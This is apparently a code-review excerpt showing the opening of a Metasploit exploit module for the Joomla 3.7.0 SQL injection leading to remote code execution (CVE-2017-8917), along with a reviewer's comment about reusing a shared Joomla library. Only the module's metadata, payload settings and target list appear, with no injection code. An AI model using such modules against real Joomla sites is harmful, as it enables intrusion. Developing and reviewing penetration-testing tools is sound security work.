modules/exploits/unix/webapp/joomla_comfields_sqli_rce.rb

```diff
@@ -0,0 +1,272 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Joomla Component Fields SQLi Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a SQL injection vulnerability found in Joomla versions
+        3.7.0.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Mateus Lino', # Vulnerability discovery
+          'luisco100 <luisco100[at]gmail.com>' # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2017-8917' ], # SQLi
+          [ 'URL', 'https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html' ]
+        ],
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          # Arbitrary big number. The payload gets sent as POST data, so
+          # really it's unlimited
+          'Space'       => 262144, # 256k
+        },
+      'Platform'       => ['php'],
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          [ 'Joomla 3.7.0 ', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "May 17 2017",
+      'DefaultTarget'  => 0))
+
+      register_options(
```

Comment:
can be removed in favor of including https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/exploit/http/joomla.rb as per previous comment